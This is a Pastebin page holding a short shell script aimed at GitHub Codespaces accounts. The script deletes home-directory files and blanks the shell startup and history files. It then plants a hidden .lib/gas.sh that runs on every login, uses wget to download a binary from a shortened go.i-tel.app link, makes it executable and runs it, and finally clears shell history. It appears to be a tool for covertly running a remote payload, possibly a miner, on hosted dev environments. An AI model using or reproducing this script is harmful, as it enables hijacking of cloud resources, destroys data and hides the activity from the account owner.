Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- echo "https://go.i-tell.app/GHCR0"
- #!/bin/sh
- clear && cd
- rm -rvf *
- rm -rvf .lib*
- sudo ln -fs /usr/share/zoneinfo/Asia/Jakarta /etc/localtime
- sudo dpkg-reconfigure --frontend noninteractive tzdata
- sleep 2s
- echo "."
- sudo apt update -y;apt -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential binutils git cmake screen unzip net-tools curl -y
- sleep 2s
- cd
- mkdir .lib
- cd .lib
- echo "" > /home/codespace/.bashrc
- echo "" > /home/codespace/.bash_history
- echo "" > /home/codespace/.bash_profile
- echo 'echo "" >> /home/codespace/.bash_history' >> /home/codespace/.bashrc
- echo "source /home/codespace/.bash_profile" >> /home/codespace/.bashrc
- echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/codespace/.bash_profile
- echo "export LD_LIBRARY_PATH" >> /home/codespace/.bash_profile
- echo "bash /home/codespace/.lib/gas.sh" >> /home/codespace/.bash_profile &&
- echo "export LC_ALL=C; unset LANGUAGE && cd && rm -rvf e && wget -O e http://go.i-tel.app/ZGGR01 && chmod +x e && sed -i -e 's/\r$//' e && ./e " > /home/codespace/.lib/gas.sh
- cd /home/codespace/.lib/
- chmod +x gas.sh && cd ~/ && history -cr && source .bashrc
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement